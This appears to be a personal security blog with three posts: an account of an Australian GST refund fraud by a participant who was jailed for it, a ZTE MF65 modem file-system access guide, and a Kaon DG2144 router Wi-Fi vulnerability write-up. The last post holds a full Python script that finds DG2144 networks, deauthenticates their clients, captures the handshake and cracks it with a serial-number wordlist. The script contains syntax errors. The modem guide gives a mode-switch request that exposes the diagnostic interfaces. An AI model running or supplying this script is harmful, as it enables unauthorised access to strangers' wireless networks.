Wednesday, 22 January 2025

The Australian Tax Office Vulnerability: A $2 Billion Oversight

 

In the wake of the COVID-19 pandemic, governments worldwide scrambled to implement financial relief measures to support their economies. Australia was no exception, but a significant vulnerability in the Australian Tax Office (ATO) system during the 2021-2022 financial year led to a staggering loss of $2 billion. This incident raises critical questions about the balance between expediency and security in government systems, as well as the potential motivations behind such oversights.

The Vulnerability Unveiled

The vulnerability stemmed from a change in the ATO's processes that allowed individuals to create an Australian Business Number (ABN) and register for Goods and Services Tax (GST) with minimal verification. Once an ABN was obtained, individuals could lodge their Business Activity Statements (BAS) monthly after their first submission. This meant that, in a matter of weeks, someone could claim a GST credit against their supposed business activities, leading to the ATO issuing refunds directly to their nominated bank accounts without thorough fact-checking.

The lack of safeguards meant that individuals could exploit this system, claiming millions of dollars in GST credits. The ATO's oversight not only cost the government $2 billion but also raised questions about whether this scheme was a covert attempt to prop up the Australian economy without announcing a formal stimulus package. Interestingly, the government would have also generated approximately $200 million in legitimate GST revenue from the $2 billion claimed, further complicating the narrative.

Personal Impact and Consequences

Caught up in this vulnerability, I found myself facing severe repercussions. Not only was I forced to serve time in jail, but I am also being compelled to pay back the outstanding debt incurred during this period. The government stands to profit from the $200 million in legitimate GST revenue, along with any fees for late accounts and interest charged on tax accounts with outstanding debts.

This situation raises a critical question: what is the cost of jailing all the individuals involved in this scheme compared to the potential profit from the $200 million? The financial burden of incarceration, legal proceedings, and the societal impact of imprisoning individuals—many of whom belong to the lowest socioeconomic classes—far outweighs the revenue generated from this oversight.

Investigations and Accountability

The ATO's internal investigations revealed that as many as 150 workers were scrutinized over the scheme, with some losing their jobs as a result. However, no criminal charges were laid against them, nor did the ATO accept any wrongdoing in the payments made to individuals who had no legitimate business activities or solid business track records. This raises concerns about accountability within the ATO and the systemic failures that allowed such a vulnerability to exist.

The situation can be viewed as a form of entrapment against the most vulnerable members of society, who were often the ones taking advantage of the system in a desperate attempt to survive during a global crisis. The majority of the applicants belonged to lower socioeconomic backgrounds, making them "low-hanging fruit" in a system that failed to protect them from exploitation.

The Flaws of Rushed Implementation

This incident highlights a critical flaw in the design and implementation of government systems: the rush to deploy solutions without adequate security measures. In the face of a global crisis, the urgency to provide financial relief overshadowed the need for robust verification processes. This oversight allowed individuals to exploit the system, demonstrating how vulnerabilities can arise when security is not prioritized.

Example Code to Prevent Exploits

To prevent such vulnerabilities, several coding practices could have been implemented. Here are three examples:

python
``` 
from datetime import datetime
import random

def is_account_age_valid(abn_creation_date):
    current_date = datetime.now()
    age = (current_date - abn_creation_date).days
    return age >= 30  # Only allow claims after 30 days

def is_claim_within_limit(claim_amount, total_claimed_last_month):
    monthly_limit = 10000  # Set a limit for claims
    return (total_claimed_last_month + claim_amount) <= monthly_limit

def should_audit_claim():
    return random.choice([True, False])  # Randomly select claims for audit
``` 

Conclusion

The vulnerability faced by the Australian Tax Office during the 2021-2022 financial year serves as a cautionary tale about the importance of security in government systems. While the urgency to provide financial relief was understandable, the lack of safeguards allowed for significant exploitation, costing the government billions. As we move forward, it is crucial to learn from these mistakes and ensure that security measures are integrated into the design and implementation of systems, especially in times of crisis. The balance between expediency and security must be carefully managed to protect public funds and maintain trust in government institutions.

The repercussions of this oversight extend beyond financial loss; they have deeply affected individuals like myself, who are now left to navigate the consequences of a system that failed to protect its most vulnerable citizens.

ZTE MF65 - EFS Access Method / Partial FS Dump: Revised

ZTE MF65 - EFS Access Method / Partial FS Dump

ZTE MF65 - EFS Access Method / Partial FS Dump

In this post, I’ll share my findings on accessing the internal file system of the ZTE MF65 modem. This guide will cover the steps to resolve a soft brick issue caused by directory traversal and provide insights into accessing internal files.

Introduction

In our previous post, we discussed the local file listing method and the necessary changes to the configuration file for continuous file listing related to SD card functions. Recently, I encountered a challenge that led to a soft brick of my device due to directory traversal on the SD card base path.

The Problem

When the router attempted to load the HTTPS share page, it reached the share path and SD base path, ultimately reading /mmc2/../. This caused the device to malfunction and become unresponsive. Fortunately, I have found a solution that not only resolves this issue but also grants us access to the internal files of the device.

Requirements

To get started, you will need the following:

  • A Windows machine (Windows XP or later)
  • QPST (Qualcomm Product Support Tool)
  • The appropriate modem drivers
  • PuTTY (for terminal access)

(Note on ZTE WCDMA Technologies MSM issue)

If you're having trouble locating the drivers, don't give up! They are available online. I recommend checking the DC-Unlocker support files, as I had to try several drivers before my machine recognized them.

Accessing the Device

To access the device, use the following command:

/goform/goform_process?goformId=MODE_SWITCH&switchCmd=FACTORY
This command will allow you to access the following devices:

  • ZTE Diagnostics Interface (COMX)
  • ZTE NMEA Device (COMY)
  • ZTE Proprietary USB Modem

***Caution: Proceed with care! Incorrect actions may result in losing access to your router.***

If you need to restore normal functions, simply execute the following command:

AT+ZCDRUN=9+ZCDRUN=F

on the COMY interface.

Using QPST Configuration

Next, launch the QPST configuration tool and ensure it points to your modem. If it doesn't, adjust the settings to select the correct COM port. Once configured, start the EFS Explorer.

You will initially be directed to the primary partition, which contains limited files of interest. By navigating to the secondary partition, you will find the file system we accessed through the local file exploit. You can easily copy files by right-clicking on them and selecting the option to save them to your PC.

Dumping NVRAM

Additionally, you can dump the NVRAM using the QPST tools. While we haven't gained a significant new foothold, we now have a reliable method to modify the web file system. Moreover, we have obtained copies of two parts of the memory, a complete copy of ztemodem.iso, and several other files that were previously inaccessible via the web server.

Conclusion

Stay tuned as we continue our quest for deeper access and further insights into the ZTE MF65! This exploration not only enhances our understanding of the device but also empowers us to utilize its full potential.

Tuesday, 21 January 2025

Wikaonwi:Kaon DG2144 Factory Wi-Fi Credential Vulnerability

Wikaonwi: A Factory Wi-Fi Credential Vulnerability

Wikaonwi: A Factory Wi-Fi Credential Vulnerability

Date: 1/21/25 9:35 PM

Today, I faced a setback when I was declined a position in the cyber security field due to a prior criminal conviction related to fraud. However, I refuse to let this discourage me. Instead, I am determined to showcase my skills and resilience by releasing another piece of my work. In a future post, I will also cover the details surrounding the charges that led to this situation. This is just one step in my journey, and I won’t allow past challenges to define my future.

Wikaonwi:

In the ever-evolving landscape of cybersecurity, vulnerabilities can often be found in the most unexpected places. One such vulnerability has been identified in the Kaon DG2144 router, where the factory Wi-Fi password is not as random as one might expect. This flaw can lead to the easy recovery of a device's Wi-Fi credentials, posing a significant risk to users. In this blog post, we will explore the details of this vulnerability, how it can be exploited, and provide a proof of concept for educational purposes.

Understanding the Vulnerability

The Kaon DG2144 router has a predictable pattern in its factory-set Wi-Fi passwords. Instead of being randomly generated, the passwords are based on the device's serial number, which follows a specific format. For example, consider the following serial numbers:


        

        BS10096321004321

        BS10096123001234

        BS10096XXX00XXXX

        

    

The passwords are constructed using a fixed prefix (BS10096) followed by a combination of numbers, making them susceptible to brute-force attacks. The predictable nature of these passwords means that an attacker can easily generate all possible combinations and attempt to gain access to the Wi-Fi network.These devices also have a prefixed SSID which makes them easier to identify being DG2144-XXXX

How We Can Exploit This Vulnerability

To exploit this vulnerability, an attacker can follow these steps:

  1. Generate All Possible Combinations: Using the known format of the password, generate all possible combinations based on the serial number structure. The format is as follows: BS10096(000-999)00(0000-9999).
  2. Scan for Target Wi-Fi Networks: Identify Wi-Fi networks that start with the SSID prefix DG2144-.
  3. Deauthenticate Connected Clients: Use a deauthentication attack to disconnect clients from the target Wi-Fi network, forcing the router to send a handshake when clients reconnect.
  4. Capture the Handshake: Monitor the network to capture the handshake, which contains the necessary information to crack the password.
  5. Crack the Handshake: Use the generated combinations to attempt to crack the captured handshake and recover the Wi-Fi password.

Proof of Concept Code

Below is a Python script that demonstrates the steps outlined above. This script is for educational purposes only and should not be used for malicious activities.


        
        
import subprocess
import time
import os
import re

# Replace wlan0 with your wireless interface
def generate_combinations():
    first_part = "BS10096"
    combinations = []

    for i in range(1000): 
        for j in range(10000): 
            combinations.append(f"{first_part}{i:03}00{j:04}")
    return combinations

def save_combinations_to_file(combinations, filename='combinations.txt'):
    with open(filename, 'w') as f:
        for combo in combinations:
            f.write(combo + '\n')

def scan_for_wifi():
    print("Scanning for Wi-Fi networks...")
    output = subprocess.check_output(["airodump-ng", "wlan0"], universal_newlines=True) 
    return output

def extract_bssid(output, target_ssid):
    bssid_pattern = re.compile(r'([0-9A-Fa-f:]{17})\s+.*\s+{}\s+'.format(target_ssid))
    bssids = bssid_pattern.findall(output)
    return bssids


def deauth_clients(bssid):
    print(f"Deauthenticating clients from {bssid}...")
    subprocess.run(["aireplay-ng", "--deauth", "10", "-a", bssid, "wlan0"]) 

def capture_handshake(bssid, output_file='captured_handshake.cap'):
    print(f"Capturing handshake for {bssid}...")
    subprocess.run(["airodump-ng", "--bssid", bssid, "-c", "6", "-w", output_file, "wlan0"]) 
    time.sleep(30)  # Wait for the handshake def crack_handshake(bssid, combinations_file='combinations.txt', handshake_file='captured_handshake.cap'):
    print(f"Cracking handshake for {bssid}...")
    subprocess.run(["aircrack-ng", "-w", combinations_file, "-b", bssid, handshake_file])

def print_banner():
    banner = r"""
                 d8, d8b                                                    d8,
                `8P  ?88                                                   `8P 
                      88b                                                      
 ?88   d8P  d8P  88b  888  d88' d888b8b   d8888b   88bd88b  ?88   d8P  d8P  88b
 d88  d8P' d8P'  88P  888bd8P' d8P' ?88  d8P' ?88  88P' ?8b d88  d8P' d8P'  88P
 ?8b ,88b ,88'  d88  d88888b   88b  ,88b 88b  d88 d88   88P ?8b ,88b ,88'  d88 
 `?888P'888P'  d88' d88' `?88b,`?88P'`88b`?8888P'd88'   88b `?888P'888P'  d88' 

    """                                                                          
    print(banner)                                                                 

def main():
    print_banner()
    target_ssid = "DG2144-"
    combinations = generate_combinations()
    save_combinations_to_file(combinations)

    # Scan for Wi-Fi networks
    output = scan_for_wifi()
    # Extract BSSID dynamically
    bssids = extract_bssid(output, target_ssid)
    if not bssids:
        print("No BSSID found for the target SSID.")
        return

    print("Available BSSIDs:")
    for bssid in bssids:
        print(bssid)

    # Select the first BSSID found
    selected_bssid = bssids[0
    # Deauthenticate clients
    deauth_clients(selected_bssid)
    # Capture the handshake
    capture_handshake(selected_bssid)
    # Crack the handshake
    crack_handshake(selected_bssid)
    
if __name__ == "__main__":
    main()

    

    

Conclusion

The vulnerability in the Kaon DG2144 router highlights the importance of strong, unpredictable passwords for network security. By understanding how such vulnerabilities can be exploited, users can take proactive measures to secure their devices. It is crucial to change factory-set passwords to unique, complex ones to mitigate the risk of unauthorized access. Always stay informed about potential vulnerabilities in your devices and take necessary precautions to protect your network.